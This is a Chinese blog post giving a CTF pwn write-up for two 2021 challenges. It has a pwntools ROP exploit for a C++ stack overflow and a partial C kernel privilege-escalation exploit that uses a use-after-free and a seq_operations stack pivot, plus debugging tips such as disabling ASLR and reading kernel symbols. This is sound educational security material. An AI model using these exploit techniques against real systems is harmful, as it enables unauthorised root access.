<!DOCTYPE html>
<html lang="zh-Hans">
<head>

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no" />
<meta name="author" content="Cyyyber" />



<meta name="description" content="虽然没参加，但不影响我写writeup :) 就看了两道比较感兴趣的题，一道是C++的，一道是内核的。并附带了一些小贴士，防止忘记">
<meta property="og:type" content="article">
<meta property="og:title" content="西湖论剑2021pwn-wp">
<meta property="og:url" content="http://cyyyber.icu/2021/11/23/%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%912021pwn-wp/index.html">
<meta property="og:site_name" content="Cyyyber&#39;s Blog">
<meta property="og:description" content="虽然没参加，但不影响我写writeup :) 就看了两道比较感兴趣的题，一道是C++的，一道是内核的。并附带了一些小贴士，防止忘记">
<meta property="og:locale">
<meta property="og:image" content="https://z3.ax1x.com/2021/12/03/oaRTAK.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/12/03/oaRHhD.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/12/03/oaRXjA.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/12/03/oaRvnI.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/12/03/oaWpAf.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/12/03/oaWC4S.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/12/03/oaWkcj.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/12/03/oaWZBq.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/12/03/oaWK4U.png">
<meta property="article:published_time" content="2021-11-22T16:00:00.000Z">
<meta property="article:modified_time" content="2021-12-03T11:08:38.530Z">
<meta property="article:author" content="Cyyyber">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="writeup">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://z3.ax1x.com/2021/12/03/oaRTAK.png">

<link rel="apple-touch-icon" href= "/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="Cyyyber&#39;s Blog" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.ico">



    <link href="//lib.baomitu.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//lib.baomitu.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//lib.baomitu.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">



<link rel="stylesheet" href="/css/style.css">




<link href="//lib.baomitu.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>西湖论剑2021pwn-wp | Cyyyber&#39;s Blog</title>

<script src="//lib.baomitu.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//lib.baomitu.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//lib.baomitu.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//lib.baomitu.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: false
    }
</script>


    <script>
        yiliaConfig.jquery_ui = [true, "//lib.baomitu.com/jqueryui/1.10.4/jquery-ui.min.js", "//lib.baomitu.com/jqueryui/1.10.4/css/jquery-ui.min.css"];
    </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






<meta name="generator" content="Hexo 5.4.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/1.jpg" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/"></a></h1>
        </hgroup>

        

        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:cyyyber@qq.com" title="Email"></a>
                            
                                <a class="fa GitHub" target="_blank" rel="noopener" href="https://github.com/Cyyyyyber" title="GitHub"></a>
                            
                                <a class="fa RSS" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CVE/" rel="tag">CVE</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/QEMU/" rel="tag">QEMU</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/fuzz/" rel="tag">fuzz</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/writeup/" rel="tag">writeup</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/" rel="tag">源码分析</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" rel="tag">漏洞分析</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://hexo.io">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://pages.github.com/">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="http://moxfive.xyz/">MOxFIVE</a>
                    
                    </div>
                </section>
                

                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页"></a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/1.jpg" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页"></a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:cyyyber@qq.com" title="Email"></a>
                            
                                <a class="fa GitHub" target="_blank" href="https://github.com/Cyyyyyber" title="GitHub"></a>
                            
                                <a class="fa RSS" target="_blank" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我"/>
</nav>
      <div class="body-wrap"><article id="post-西湖论剑2021pwn-wp" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2021/11/23/%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%912021pwn-wp/" class="article-date">
      <time datetime="2021-11-22T16:00:00.000Z" itemprop="datePublished">2021-11-23</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      西湖论剑2021pwn-wp
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/writeup/" rel="tag">writeup</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>虽然没参加，但不影响我写writeup :)</p>
<p>就看了两道比较感兴趣的题，一道是C++的，一道是内核的。并附带了一些小贴士，防止忘记</p>
<span id="more"></span>

<h1 id="string-go"><a href="#string-go" class="headerlink" title="string_go"></a>string_go</h1><h2 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h2><p>一道C++的题，调用calc计算输入的表达式，如果为结果为3就调用存在漏洞的函数lative_func</p>
<p>刚开始看到时候被calc函数绕了好久，其实不用把calc细节看明白，看函数名就能猜出来它的作用了</p>
<p><img src="https://z3.ax1x.com/2021/12/03/oaRTAK.png"></p>
<p>lative_func里先输入索引v7，再输入字符串v10，然后将v10中索引为v7的字符修改为新输入到字符并输出，后面是一个明显的memcpy栈溢出</p>
<p><img src="https://z3.ax1x.com/2021/12/03/oaRHhD.png"></p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>因为v7是有符号的int类型，所以可以输入-1向上写，而v10上面存的是v10的长度，所以可以将v10的长度修改成大数，造成栈泄露，然后利用下面栈溢出ROP或者直接one gadget</p>
<h2 id="小贴士"><a href="#小贴士" class="headerlink" title="小贴士"></a>小贴士</h2><p>调试时使用命令<code>sudo sh -c &quot;echo 0 &gt; /proc/sys/kernel/randomize_va_space&quot;</code>关闭ASLR方便调试</p>
<p>利用glibc-all-in-one和patchelf修改程序的链接库，利用ldd查看修改状态</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">patchelf --set-interpreter /home/cy/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/ld-2.27.so string_go</span><br><span class="line">patchelf --replace-needed libc.so.6 /home/cy/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so string_go</span><br><span class="line">ldd ./string_go</span><br></pre></td></tr></table></figure>

<p>利用ROPgadget可以将libc的汇编代码输出，也可以找到字符串</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary ./libc-2.27.so &gt; rop</span><br><span class="line">ROPgadget --binary ./libc-2.27.so --string &#x27;/bin/sh&#x27;</span><br></pre></td></tr></table></figure>

<p>利用one_gadget可以直接找到one gadget</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">one_gadget ./libc-2.27.so</span><br></pre></td></tr></table></figure>

<h2 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context.log_level=  &#x27;debug&#x27;</span></span><br><span class="line">p = process(<span class="string">&#x27;./string_go&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc-2.27.so&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&quot;&gt;&gt;&gt;&quot;</span>, <span class="string">&quot;3&quot;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;&gt;&gt;&gt;&quot;</span>, <span class="string">&quot;-1&quot;</span>) <span class="comment">#offset</span></span><br><span class="line">p.sendlineafter(<span class="string">&quot;&gt;&gt;&gt;&quot;</span>, <span class="string">&quot;1&quot;</span>) <span class="comment">#leak</span></span><br><span class="line">p.sendlineafter(<span class="string">&quot;&gt;&gt;&gt;&quot;</span>, <span class="string">&quot;1&quot;</span>) <span class="comment">#pa</span></span><br><span class="line">p.recv()</span><br><span class="line">leak = p.recv()</span><br><span class="line">libc_base = u64(leak[<span class="number">0xf8</span>:<span class="number">0xf8</span>+<span class="number">8</span>])-<span class="number">0x21bf7</span></span><br><span class="line">canary = u64(leak[<span class="number">0x38</span>:<span class="number">0x38</span>+<span class="number">8</span>])</span><br><span class="line">rop = <span class="string">&quot;a&quot;</span>*<span class="number">0x18</span>+p64(canary)+p64(<span class="number">0</span>)*<span class="number">3</span></span><br><span class="line"><span class="comment"># rop += p64(libc_base+0x4f3d5) #one gadget</span></span><br><span class="line">rop += p64(libc_base+<span class="number">0x215bf</span>) <span class="comment">#pop rdi, ret</span></span><br><span class="line">rop += p64(libc_base+<span class="number">0x1b3e1a</span>) <span class="comment">#/bin/sh</span></span><br><span class="line">rop += p64(libc_base+<span class="number">0x215c0</span>) <span class="comment">#retn</span></span><br><span class="line">rop += p64(libc_base+libc.symbols[<span class="string">&#x27;system&#x27;</span>]) <span class="comment">#system</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">p.sendline(rop)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>其中rop链里在system之前多加了一个ret，是因为在 x86_64的系统里return回glibc函数时需要确保栈是对齐的，这里的ret就起到了占位的作用，具体参考<a target="_blank" rel="noopener" href="https://ropemporium.com/guide.html#:~:text=The%20MOVAPS%20issue,a%20push%20instruction.">这里</a></p>
<h1 id="easykernel"><a href="#easykernel" class="headerlink" title="easykernel"></a>easykernel</h1><h2 id="题目-1"><a href="#题目-1" class="headerlink" title="题目"></a>题目</h2><p>start.sh如下，开启了smep和kaslr保护</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash">!/bin/sh</span></span><br><span class="line"></span><br><span class="line">qemu-system-x86_64  \</span><br><span class="line">-m 64M \</span><br><span class="line">-cpu kvm64,+smep \</span><br><span class="line">-kernel ./bzImage \</span><br><span class="line">-initrd rootfs.img \</span><br><span class="line">-nographic \</span><br><span class="line">-s \</span><br><span class="line">-append &quot;console=ttyS0 kaslr quiet&quot;</span><br></pre></td></tr></table></figure>

<p>驱动提供了增删改查功能</p>
<p>增：commond为0x20，最大只能申请0x20的块</p>
<p><img src="https://z3.ax1x.com/2021/12/03/oaRXjA.png"></p>
<p>删：command为0x30，free之后没有清零，可以UAF</p>
<p><img src="https://z3.ax1x.com/2021/12/03/oaRvnI.png"></p>
<p>改：command为0x50</p>
<p><img src="https://z3.ax1x.com/2021/12/03/oaWpAf.png"></p>
<p>查：命令为0x40，最多可以输出0x100的内容，可以用来泄露地址</p>
<p><img src="https://z3.ax1x.com/2021/12/03/oaWC4S.png"></p>
<h2 id="漏洞分析-1"><a href="#漏洞分析-1" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>可以将0x20大小的对象放入freelist后打开一个proc文件，此时创建seq_operations结构体从freelist分配对象，利用uaf泄露seq_operations结构体中的指针，再通过修改seq_operations结构体中的指针从而栈迁移，再构造ROP链进行提权</p>
<blockquote>
<p>在可以UAF的时候，利用seq_operations结构体，达到泄露地址或执行代码的目的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">struct seq_operations &#123;</span><br><span class="line">	void * (*start) (struct seq_file *m, loff_t *pos);</span><br><span class="line">	void (*stop) (struct seq_file *m, void *v);</span><br><span class="line">	void * (*next) (struct seq_file *m, void *v, loff_t *pos);</span><br><span class="line">	int (*show) (struct seq_file *m, void *v);</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>对proc文件系统进行读取的时候，限制了一次最多读一页，如果超过那么只能多次读取，这样就会增加读取次数从而增加系统调用的次数，影响了效率。所以出现了<code>seq_file</code>的序列文件出现，该功能使得对于读取大文件更加容易。 至于其中更深层次的细节，我这里就不赘述了，总而言之，试图读取proc文件系统中的文件时，会创建一个<code>seq_file</code>结构体，作为这个结构体成员的<code>seq_operations</code>也相应产生。 在打开一个序列文件的时候会调用<code>seq_open</code>，之后读取文件内容时，<code>seq_operations</code>的执行顺序为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">start() ==&gt; next() ==&gt; show() ==&gt; ... ==&gt; next() ==&gt; show() ==&gt; stop();</span><br></pre></td></tr></table></figure>

<p>打开一个proc文件之后，总是第二个0x20的object被分配给<code>seq_operations</code>使用，但是我并没有深究第一个是被谁申请的，也并不清楚这在所有内核版本中是否是通用的情况。</p>
<p>利用方法：将0x20大小的对象放到freelist后，打开一个proc文件，比如<code>/proc/self/stat</code>，然后通过分配到seq_operations结构体的对象泄露内核地址以及设置好寄存器后修改<code>seq_opeartions-&gt;start</code>为类似<code>xchg eax, esp; ret;</code>的栈迁移gadget，再进行后续的rop提权</p>
<p>可以进行栈迁移的原因是在即将调用<code>seq_operations-&gt;start()</code>的时候rax寄存器中保存的就是这个函数指针，而<code>xchg eax, esp; ret;</code>会将rsp和rax交换，并只保留低位数据，所以如果事先使用mmap在用户空间分配一个32位的地址空间，其低位与该gadget地址一致，则交换以后rsp指向mmap分配的内存，实现栈迁移</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">rax : 0xffffffffaf1c4878 ◂— xchg   eax, esp</span><br><span class="line">rsp : 0xffffbb04801ffdb8</span><br><span class="line">(ni)</span><br><span class="line">rax : 0x801ffdb8</span><br><span class="line">rsp : 0xaf1c4878(事先用mmap分配0xaf1c4000的内存空间，则可以将栈迁移到可控内存)</span><br></pre></td></tr></table></figure>
</blockquote>
<h2 id="小贴士-1"><a href="#小贴士-1" class="headerlink" title="小贴士"></a>小贴士</h2><p>kerpwn_init函数中的misc结构体可以看到驱动的名字和重写的函数</p>
<p><img src="https://z3.ax1x.com/2021/12/03/oaWkcj.png"></p>
<p><img src="https://z3.ax1x.com/2021/12/03/oaWZBq.png"></p>
<p>调试时可以把init中自动关机的代码注释掉，id设置为0就可以用root权限调试</p>
<p><img src="https://z3.ax1x.com/2021/12/03/oaWK4U.png" alt="image-20211203001122298"></p>
<p>设置为root权限后就可以查看驱动的基地址，两个提权用的内核函数地址以及内核基地址</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">lsmod #驱动的基地址</span><br><span class="line">cat /proc/kallsyms | grep prepare_kernel_cred  #prepare_kernel_cred函数地址</span><br><span class="line">cat /proc/kallsyms | grep commit_creds	#commit_creds函数地址</span><br><span class="line">cat /proc/kallsyms | grep startup_64 #内核基地址</span><br></pre></td></tr></table></figure>

<p>ROPgadget得到的gadget常常有一些无关的指令，可以借助机器码提取要用的指令，也可以直接到ida中搜索需要的机器码，常用机器码如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">c3       : ret;</span><br><span class="line">0f 22 e7 : mov cr4,rdi;</span><br><span class="line">94       : xchg eax, esp;</span><br><span class="line">50       : push rax;</span><br><span class="line">5f       : pop rdi;</span><br><span class="line">5a       : pop rdx;</span><br><span class="line">48 89 c7 : mov rdi,rax</span><br><span class="line">0f 01 f8 : swapgs;</span><br><span class="line">48 cf    : iretq</span><br></pre></td></tr></table></figure>

<p>ROPgadget得到的gadget里没有iretq，可以通过<code>objdump --section .text -d ./vmlinux|grep iretq</code>找到</p>
<h2 id="EXP-1"><a href="#EXP-1" class="headerlink" title="EXP"></a>EXP</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;pthread.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/ioctl.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/types.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/stat.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/wait.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;fcntl.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;signal.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdint.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/mman.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/prctl.h&gt;</span> </span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> KERNCALL __attribute__((regparm(3))) </span></span><br><span class="line"></span><br><span class="line"><span class="keyword">void</span>* (*prepare_kernel_cred)(<span class="keyword">void</span>*) KERNCALL = (<span class="keyword">void</span>*) <span class="number">0xc91d0</span>;</span><br><span class="line"><span class="keyword">void</span> (*commit_creds)(<span class="keyword">void</span>*) KERNCALL = (<span class="keyword">void</span>*) <span class="number">0xc8d40</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">long</span> user_cs, user_ss, user_rflags, user_sp;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">save_stat</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="keyword">asm</span>(</span><br><span class="line">        <span class="string">&quot;movq %%cs, %0;&quot;</span></span><br><span class="line">        <span class="string">&quot;movq %%ss, %1;&quot;</span></span><br><span class="line">        <span class="string">&quot;movq %%rsp, %2;&quot;</span></span><br><span class="line">        <span class="string">&quot;pushfq;&quot;</span></span><br><span class="line">        <span class="string">&quot;popq %3;&quot;</span></span><br><span class="line">        : <span class="string">&quot;=r&quot;</span> (user_cs), <span class="string">&quot;=r&quot;</span> (user_ss), <span class="string">&quot;=r&quot;</span> (user_sp), <span class="string">&quot;=r&quot;</span> (user_rflags) : : <span class="string">&quot;memory&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">shell</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">if</span>(getuid() == <span class="number">0</span>)&#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;[+] root!&quot;</span>);</span><br><span class="line">        system(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;[-] failed!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">be_root</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	commit_creds(prepare_kernel_cred(<span class="number">0</span>));</span><br><span class="line">	<span class="keyword">asm</span>(</span><br><span class="line">		<span class="string">&quot;pushq %0;&quot;</span></span><br><span class="line">		<span class="string">&quot;pushq %1;&quot;</span></span><br><span class="line">		<span class="string">&quot;pushq %2;&quot;</span></span><br><span class="line">		<span class="string">&quot;pushq %3;&quot;</span></span><br><span class="line">		<span class="string">&quot;pushq $shell;&quot;</span></span><br><span class="line">		<span class="string">&quot;pushq $0;&quot;</span></span><br><span class="line">		<span class="string">&quot;swapgs;&quot;</span></span><br><span class="line">		<span class="string">&quot;popq %%rbp;&quot;</span></span><br><span class="line">		<span class="string">&quot;iretq;&quot;</span></span><br><span class="line">		::<span class="string">&quot;m&quot;</span>(user_ss), <span class="string">&quot;m&quot;</span>(user_sp), <span 